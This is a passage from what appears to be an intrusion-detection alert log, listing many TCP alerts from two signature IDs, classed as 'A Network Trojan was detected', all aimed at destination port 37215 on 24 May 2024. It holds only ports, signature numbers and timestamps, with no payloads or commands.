              SID:2829579
              Source Port:60304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161676
              SID:2829579
              Source Port:37448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.532339
              SID:2829579
              Source Port:53922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114528
              SID:2835222
              Source Port:45594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408058
              SID:2829579
              Source Port:49954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.751587
              SID:2835222
              Source Port:48300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870669
              SID:2835222
              Source Port:39764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110821
              SID:2835222
              Source Port:44930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044497
              SID:2829579
              Source Port:33580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420435
              SID:2829579
              Source Port:34800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924106
              SID:2835222
              Source Port:50184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441440
              SID:2829579
              Source Port:54920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544136
              SID:2835222
              Source Port:52482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.759696
              SID:2835222
              Source Port:58092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519590
              SID:2829579
              Source Port:49704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596071
              SID:2829579
              Source Port:41096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420486
              SID:2835222
              Source Port:59880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100636
              SID:2829579
              Source Port:45188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433471
              SID:2829579
              Source Port:51286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119381
              SID:2829579
              Source Port:50824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368986
              SID:2829579
              Source Port:38820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.768125
              SID:2829579
              Source Port:55932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542927
              SID:2829579
              Source Port:56254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549234
              SID:2829579
              Source Port:36216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522354
              SID:2829579
              Source Port:34496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724916
              SID:2829579
              Source Port:59854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.060045
              SID:2835222
              Source Port:49686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595443
              SID:2835222
              Source Port:56492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.603816
              SID:2829579
              Source Port:51652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334151
              SID:2829579
              Source Port:58294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394115
              SID:2835222
              Source Port:40612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926725
              SID:2835222
              Source Port:56198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364325
              SID:2835222
              Source Port:60202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458424
              SID:2829579
              Source Port:43936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570539
              SID:2835222
              Source Port:36850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600507
              SID:2829579
              Source Port:52152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207243
              SID:2835222
              Source Port:40328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368761
              SID:2835222
              Source Port:44156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519454
              SID:2829579
              Source Port:35464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833862
              SID:2835222
              Source Port:50988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457733
              SID:2829579
              Source Port:41440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519172
              SID:2829579
              Source Port:47932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097340
              SID:2835222
              Source Port:60606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920366
              SID:2829579
              Source Port:36854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486176
              SID:2829579
              Source Port:60152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460547
              SID:2835222
              Source Port:39474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585000
              SID:2835222
              Source Port:57896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148757
              SID:2835222
              Source Port:54286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397398
              SID:2835222
              Source Port:52430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480450
              SID:2829579
              Source Port:50532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057586
              SID:2835222
              Source Port:58602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.759781
              SID:2829579
              Source Port:32778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097675
              SID:2829579
              Source Port:45296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445816
              SID:2829579
              Source Port:41650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551794
              SID:2835222
              Source Port:60160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169207
              SID:2835222
              Source Port:34704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693242
              SID:2829579
              Source Port:59526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636542
              SID:2835222
              Source Port:40910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360565
              SID:2835222
              Source Port:33364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369059
              SID:2829579
              Source Port:50680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750080
              SID:2835222
              Source Port:59736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186422
              SID:2835222
              Source Port:33308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246494
              SID:2835222
              Source Port:45390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495338
              SID:2829579
              Source Port:40164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.874009
              SID:2835222
              Source Port:60454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797325
              SID:2829579
              Source Port:48488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391324
              SID:2829579
              Source Port:59028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395598
              SID:2829579
              Source Port:45774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062711
              SID:2835222
              Source Port:40648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347806
              SID:2829579
              Source Port:60790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823655
              SID:2835222
              Source Port:51602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041093
              SID:2829579
              Source Port:54020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.796496
              SID:2835222
              Source Port:60192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078168
              SID:2829579
              Source Port:38432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.628103
              SID:2835222
              Source Port:34252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726366
              SID:2829579
              Source Port:51134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121443
              SID:2835222
              Source Port:39264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601463
              SID:2835222
              Source Port:43994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400749
              SID:2835222
              Source Port:53398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624372
              SID:2835222
              Source Port:44812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663738
              SID:2829579
              Source Port:48080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447213
              SID:2829579
              Source Port:45598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270599
              SID:2829579
              Source Port:45460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397723
              SID:2829579
              Source Port:39010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.491540
              SID:2829579
              Source Port:56878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.738864
              SID:2829579
              Source Port:59030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441262
              SID:2835222
              Source Port:38638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547095
              SID:2835222
              Source Port:59090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.751965
              SID:2829579
              Source Port:44914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120768
              SID:2829579
              Source Port:52518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920420
              SID:2835222
              Source Port:33528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727054
              SID:2835222
              Source Port:57478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.972142
              SID:2829579
              Source Port:51454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423383
              SID:2835222
              Source Port:56910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507135
              SID:2835222
              Source Port:35082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429741
              SID:2829579
              Source Port:39868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980745
              SID:2835222
              Source Port:54402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431314
              SID:2835222
              Source Port:47348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596640
              SID:2829579
              Source Port:59882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166954
              SID:2829579
              Source Port:51522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503238
              SID:2835222
              Source Port:36866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102196
              SID:2829579
              Source Port:44554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446908
              SID:2835222
              Source Port:57016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982354
              SID:2829579
              Source Port:45970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355366
              SID:2835222
              Source Port:34022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063398
              SID:2829579
              Source Port:47990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634682
              SID:2835222
              Source Port:54706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536617
              SID:2829579
              Source Port:37576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518879
              SID:2835222
              Source Port:57224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546140
              SID:2829579
              Source Port:36284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505644
              SID:2829579
              Source Port:37964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694579
              SID:2835222
              Source Port:32926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546090
              SID:2835222
              Source Port:34092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.822877
              SID:2835222
              Source Port:47866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594608
              SID:2829579
              Source Port:39570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598951
              SID:2835222
              Source Port:45636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.830458
              SID:2835222
              Source Port:51582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128247
              SID:2835222
              Source Port:49594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445092
              SID:2835222
              Source Port:42238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481444
              SID:2835222
              Source Port:50552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118971
              SID:2835222
              Source Port:33256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361054
              SID:2829579
              Source Port:50368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394456
              SID:2835222
              Source Port:58824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100606
              SID:2829579
              Source Port:40682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870420
              SID:2829579
              Source Port:43050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517257
              SID:2835222
              Source Port:45080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575771
              SID:2829579
              Source Port:52976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.698342
              SID:2829579
              Source Port:59042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661358
              SID:2835222
              Source Port:51412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536937
              SID:2835222
              Source Port:42924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.597729
              SID:2835222
              Source Port:48956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662019
              SID:2829579
              Source Port:59044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582670
              SID:2829579
              Source Port:40412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308681
              SID:2829579
              Source Port:52222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642976
              SID:2829579
              Source Port:33214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.467880
              SID:2835222
              Source Port:51510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308755
              SID:2829579
              Source Port:45742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431229
              SID:2835222
              Source Port:51762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166333
              SID:2829579
              Source Port:50792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.104992
              SID:2829579
              Source Port:52842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552323
              SID:2829579
              Source Port:49396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.080898
              SID:2835222
              Source Port:41412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341055
              SID:2829579
              Source Port:50798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371934
              SID:2835222
              Source Port:49798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443562
              SID:2829579
              Source Port:50220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552225
              SID:2829579
              Source Port:48552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053960
              SID:2829579
              Source Port:56260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205263
              SID:2835222
              Source Port:40188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.968983
              SID:2835222
              Source Port:50842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205318
              SID:2829579
              Source Port:39502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313675
              SID:2829579
              Source Port:45088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432214
              SID:2835222
              Source Port:48890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926361
              SID:2835222
              Source Port:35372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309182
              SID:2835222
              Source Port:56520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638829
              SID:2835222
              Source Port:36242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819878
              SID:2829579
              Source Port:48918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230804
              SID:2835222
              Source Port:33318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053457
              SID:2835222
              Source Port:52472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199787
              SID:2835222
              Source Port:45570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547423
              SID:2829579
              Source Port:46114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.597883
              SID:2829579
              Source Port:45924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250782
              SID:2835222
              Source Port:52362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.417085
              SID:2829579
              Source Port:57700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397237
              SID:2835222
              Source Port:55270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200656
              SID:2829579
              Source Port:50464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485266
              SID:2829579
              Source Port:47572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873976
              SID:2835222
              Source Port:50962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234465
              SID:2835222
              Source Port:33882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542275
              SID:2835222
              Source Port:37248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.703557
              SID:2829579
              Source Port:47006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421619
              SID:2829579
              Source Port:44454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505750
              SID:2829579
              Source Port:48866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397268
              SID:2829579
              Source Port:53636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198561
              SID:2835222
              Source Port:48222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536457
              SID:2829579
              Source Port:42044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482818
              SID:2829579
              Source Port:40814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197935
              SID:2835222
              Source Port:54558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551279
              SID:2835222
              Source Port:32866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.680998
              SID:2835222
              Source Port:33698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394139
              SID:2835222
              Source Port:42508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637823
              SID:2829579
              Source Port:55634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099683
              SID:2835222
              Source Port:56966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574422
              SID:2829579
              Source Port:46844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063360
              SID:2835222
              Source Port:57132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269998
              SID:2835222
              Source Port:46694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061190
              SID:2835222
              Source Port:33162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724950
              SID:2835222
              Source Port:45344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333982
              SID:2829579
              Source Port:39010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695862
              SID:2835222
              Source Port:52622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057269
              SID:2835222
              Source Port:37502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543751
              SID:2829579
              Source Port:51666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.608365
              SID:2835222
              Source Port:45400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097376
              SID:2835222
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606402
              SID:2829579
              Source Port:38336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764531
              SID:2829579
              Source Port:56730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457036
              SID:2835222
              Source Port:59320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300288
              SID:2835222
              Source Port:34788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457869
              SID:2835222
              Source Port:50468
              Destination Port:37215
